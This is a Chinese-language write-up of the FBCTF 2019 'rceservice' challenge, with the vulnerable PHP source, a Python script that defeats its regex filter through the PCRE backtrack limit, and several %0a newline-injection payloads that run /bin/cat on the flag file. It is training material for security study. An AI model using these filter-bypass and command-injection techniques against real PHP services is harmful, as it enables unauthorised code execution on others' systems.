[FBCTF 2019]rceservice 详细题解

news/2024/12/5 18:54:25/

知识点:

json字符串
PHP正则表达式元字符
PCRE回溯机制绕过正则表达式
%0a 换行符绕过正则表达式(详细讲解)

提示 Enter command as JSON
题目还有一个附件,打开是index.php文件源码

php"><?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {$json = $_REQUEST['cmd'];if (!is_string($json)) {echo 'Hacking attempt detected<br/><br/>';} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {echo 'Hacking attempt detected<br/><br/>';} else {echo 'Attempting to run command:<br/>';$cmd = json_decode($json, true)['cmd'];if ($cmd !== NULL) {system($cmd);} else {echo 'Invalid input';}echo '<br/><br/>';}
}
?>

代码中$cmd = json_decode($json, true)['cmd'];
json_decode(): 这个函数用于将JSON格式的字符串解码为PHP变量,参数 $json 是要被解码的 JSON 字符串,格式类似 {"cmd": "ls"}

json_decode第二个参数被设置为true,意味着json_decode函数将返回一个关联数组(array)而不是一个对象(object),把json_decode函数返回的关联数组中的'cmd'键对应的值赋值给变量$command

这里正则表达式明显过滤的非常严格,过滤了非常多东西,使用的格式是  ^.*(捕获组).*$

. 表示匹配任意单个字符(除了换行符) 

* 是量词,表示前面的元素可以出现0次或多次。

.* 表示匹配任意数量的任意字符(默认不会匹配换行符,需要修饰符才会匹配)

加上^ 变成 ^.*  表示从字符串的开始位置匹配任意数量的任意字符 

后面的  .*$  表示从当前位置匹配任意数量的任意字符,直到行尾

括号表示捕获组,可以在匹配过程中捕获一部分匹配的内容,并且可以在后续处理中引用这些被捕获的部分

注意到正则匹配中  [\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+  
\x00-\x1F  表示从 ASCII 码 0 到 31 的字符(控制字符),A-Z0-9 就是大写字母和数字,这里没有用修饰符i 没有过滤小写字母,后面的+表示可以匹配1次或多次

正则表达式中的构造会在下面第二种解法中详细讲解

既然没有过滤小写字母,那么传入{"cmd": "ls"}    回显 index.php


但是传入{"cmd": "ls /"}   就会回显 Hacking attempt detected   因为/ 被禁止了

到这里基本上就没有机会了,正常的传参是行不通的,过滤的太严格,只能想办法绕过正则

解法一: PCRE回溯机制绕过正则表达式

具体的原理和思路可以参考大佬的文章,这里不多赘述,文章讲的很好,清晰明了

PHP利用PCRE回溯次数限制绕过某些安全限制 - FreeBuf安全>网络安全行业门户

简而言之就是PCRE回溯机制有一个回溯限制次数——大约100 万次,当回溯超出这个次数,还没吐完的字符串就可以逃逸绕过匹配
通过发送超长字符串的方式,使正则执行失败,让传入的参数逃逸,从而正常执行命令绕过限制


那么就传入一个json格式字符串,里面的键名为cmd,键值为执行的命令  
然后在payload后加上100万个字符即可,等匹配超过这个次数时语句自然就可以逃逸掉

不过一般这种逃逸需要post传参,因为get传参是有长度限制的,100万的参数长度明显有点太过于庞大了

前面传入命令的时候可以看到参数cmd在url中回显了,所以大家会认为是GET形式

但是如果大家抓包测试post传参的话会得到一样的效果,例如我post传参cmd={"cmd":"ls"}  依然回显了index.php

估计源码应该是用了$_REQUEST 来接收参数,当然只是我个人的猜测

下面给出字符串逃逸脚本:

import requests
payload = '{"cmd":"ls /", "abc":"'+'a'*1000000+'"}'
res = requests.post("http://node4.anna.nssctf.cn:28794/",data = {"cmd":payload})
print(res.text)

payload里面除了前面cmd的命令不要改动之外,其他的参数如 abc 可以随意,后面的a也随意,长度满足即可

没有发现flag文件,查看一下环境变量有没有flag     把 ls / 改为 env  执行system('env')

发现没有回显,那么flag文件应该就在这些根目录某个路径下 使用find命令查找一下

find / -name flag 发现依然没有回显,难道flag文件名中没有flag 测试一下index.php文件能不能find

发现index.php 也无法find  那么应该是没有成功执行find 命令

php">putenv('PATH=/home/rceservice/jail');

这行 PHP 代码的作用是设置环境变量 PATH 的值为 /home/rceservice/jail
意味着我们无法直接去调用find  cat等命令,因为这些命令实际上是存放在特定目录中封装好的程序,PATH环境变量就是存放这些特定目录的路径方便我们去直接调用这些命令,所以此处部分命令需要使用其存放的绝对路径去调用

可以用where find whereis find 或者 which find 来查看find命令的路径

这里传参给cmd是不会回显find命令的路径的,可以自己linux系统中输出查看

find命令 在/bin/ 和 /usr/bin/  目录下都存在  这里只有/usr/bin/find 路径可以使用

改一下代码

php">payload = '{"cmd":"/usr/bin/find / -name flag", "abc":"'+'a'*1000000+'"}'

成功得到/home/rceservice/flag


   
cat命令和find命令一样在 /bin/ 和 /usr/bin/  目录下都存在  不知道为什么这里只能/bin/cat 才能使用而find命令在/usr/bin/find 才能使用,如果有大佬知道的话可以评论一下

php">payload = '{"cmd":"/bin/cat /home/rceservice/flag", "abc":"'+'a'*1000000+'"}'

成功得到flag

 

解法二: %0a 绕过

这里重点讲一下%0a 构造的位置问题

正则表达式是 ^...$ 格式  如果没有修饰符m 那么^只会匹配第一行的内容,可以利用%0a换行符绕过
而且这里还用了.* 贪婪匹配  也没有修饰符s  所以 .* 也不会匹配换行符%0a
那么只需传入换行符%0a,那么就可以绕过 .* 从而绕过正则匹配
但是这里正则匹配表达式中 \x00-\x1F 过滤了ascii码 0-31 的控制字符,包含了换行符,因此%0a会被匹配
也就是说如果传入的命令是

php">{%0a"cmd":"/bin/cat /home/rceservice/flag"} 

此时 .* 匹配了最开始的左括号{  因为遇到%0a就不匹配了,然后正则表达式括号中的\x00-\x1F 匹配了换行符%0a  而后面的+表示可以匹配1次或多次,因此在%0a后面再多添加几个%0a也没用   最后的.* 匹配了"cmd":"/bin/cat /home/rceservice/flag"}  从而匹配成功,如下图所示

这是我测试正则匹配的简单代码,数字 1 2 3 代表引用代码中正则表达式的三个括号捕获组的结果

如果在字符串最末尾的 } 之前加上一个%0a    变成

php">{%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}

此时.* 匹配 {    而\x00-\x1F 匹配了第一个%0a  但是最后的 .* 不能匹配换行符,因此也匹配不到换行后的 }    所以不能匹配到完整字符串,返回值为空,完成正则绕过

构造  即可得到flag

php">?cmd={%0a"cmd":"/bin/cat /home/rceservice/flag"%0a} 

在单行模式下 $元字符 似乎会忽略在句尾的 %0a 

如果%0a 添加在字符串最后的话依然会被匹配,至少需要两个%0a才可以,不太确定原理,大佬们知道的话可以指点一下


其他构造格式:  

或者如果在字符串的 { 前面加上%0a 变成    %0a{"cmd":"/bin/cat /home/rceservice/flag"}
此时第一个.* 匹配的不是空null, 是空字符串"",因为*可以匹配0次或多次, \x00-\x1F 匹配了%0a   最后的.*匹配到字符串结束   从而也会匹配成功

那么可以在后面多加一个%0a来绕过,当然不能直接加在第一个%0a后面,这样会被+匹配多次,只要跟第一个%0a隔开就可以,这样第二个换行符不会被最后的.*匹配,无法遍历完整字符串,绕过匹配
下面这些也是正确的格式,例如:         

php">?cmd=%0a{%0a"cmd":"/bin/cat /home/rceservice/flag"}
?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"%0a}

不过还是不能把%0a加在最后,如果要想在最后加%0a,至少要加2个%0a  
例如

php">?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"}%0a%0a

http://www.ppmy.cn/news/1546570.html

相关文章

九、HttpMessageConverter

文章目录 1. RequestBody2. RequestEntity3. ResponseBody4. SpringMVC处理json5. SpringMVC处理ajax6. RestController注解7. ResponseEntity 1. RequestBody 2. RequestEntity 3. ResponseBody 4. SpringMVC处理json 5. SpringMVC处理ajax 6. RestController注解 7. Response…

分享三个python爬虫案例

一、爬取豆瓣电影排行榜Top250存储到Excel文件 近年来&#xff0c;Python在数据爬取和处理方面的应用越来越广泛。本文将介绍一个基于Python的爬虫程序&#xff0c;用于抓取豆瓣电影Top250的相关信息&#xff0c;并将其保存为Excel文件。 获取网页数据的函数&#xff0c;包括以…

Redis - 数据库管理

Redis 提供了⼏个⾯向Redis数据库的操作&#xff0c;分别是dbsize、select、flushdb、flushall命令&#xff0c; 本机将通过具体的使⽤常⻅介绍这些命令。 一、切换数据库 select dbIndex 许多关系型数据库&#xff0c;例如MySQL⽀持在⼀个实例下有多个数据库存在的&#…

不加锁解决线程安全

不加锁解决线程安全 一、使用原子类&#xff08;Atomic Classes&#xff09; 原理&#xff1a; Java.util.concurrent.atomic 包提供了一系列原子类&#xff0c;如 AtomicInteger、AtomicLong、AtomicBoolean 等。这些原子类内部利用 CAS&#xff08;Compare and Swap&#xf…

Linux基础之病毒编写

声明&#xff1a;学习视频来自b站up主 泷羽sec&#xff0c;如涉及侵权马上删除文章 声明&#xff1a;本文主要用作技术分享&#xff0c;所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险&#xff0c;并遵循相关法律法规。 感谢泷…

MongoDB——服务端连接及查询

一、登录 登录命令&#xff1a;mongo localhost/db -u username -p。其中db为要登录的db&#xff0c;username为账户&#xff0c;然后输入密码回车&#xff1a; 登录成功 二、数据库操作 1、创建db&#xff1a;use testDB。 2、查看有哪些db&#xff1a;show dbs。 3、查看…

【React】默认导出和具名导出

这是 JavaScript 里两个主要用来导出值的方式&#xff1a;默认导出和具名导出。一个文件里有且仅有一个 默认导出&#xff0c;但是可以有任意多个具名导出。 1.默认导出&#xff1a; 导出语句 export default function Button() {}导入语句 import Button from ./Button.js;…

ACIS中wire与edge的区别是什么

在ACIS中&#xff0c;Wire表示没有附着在面上、连接在一起的有向边的集合&#xff0c;可以表示闭合曲线或一些理想化的对象&#xff1b;而Edge表示由两个顶点连接而成、具有方向属性的直线段或圆弧&#xff0c;用于定义曲线的拓扑结构。 • Wire&#xff08;线框&#xff09;&a…